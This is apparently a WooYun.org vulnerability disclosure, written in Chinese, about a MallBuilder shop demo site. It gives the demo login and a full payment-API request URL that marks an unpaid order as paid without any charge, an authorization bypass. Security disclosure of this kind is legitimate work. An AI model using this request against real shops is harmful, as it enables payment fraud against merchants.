WooYun.org

一个越权引发的血案，越权地址从正常支付的订单里抓来的，利用过程如下：
http://democn.mall-builder.com test test
这是官方的测试账号，账号本身也是卖家账号，需要先在右上角手动切换到买家中心
为了方便，就不新下订单了，直接挑一个原有的旧订单：
http://democn.mall-builder.com/main.php?m=product&s=admin_orderdetail&id=201408221129296

现在是未付款状态，抓下订单号：201408221129296
访问：
http://democn.mall-builder.com/api/order.php?id=201408221129296&type=预存款支付&order_id=201408221129296&price=598&extra_param=&statu=1&auth=27a2824875956f6d6e268a992ad3f8c4
各参数对应订单号和价格，最后的auth无视，直接打开，奇迹出现了：

“付款”成功，订单变为未发货状态
再去mallbuilder自带的支付平台上看一下：
在买家中心的首页偏右上角有链接“网付宝”，前台也有链接
http://democn.mall-builder.com/pay/

没有支出记录，免费支付订单~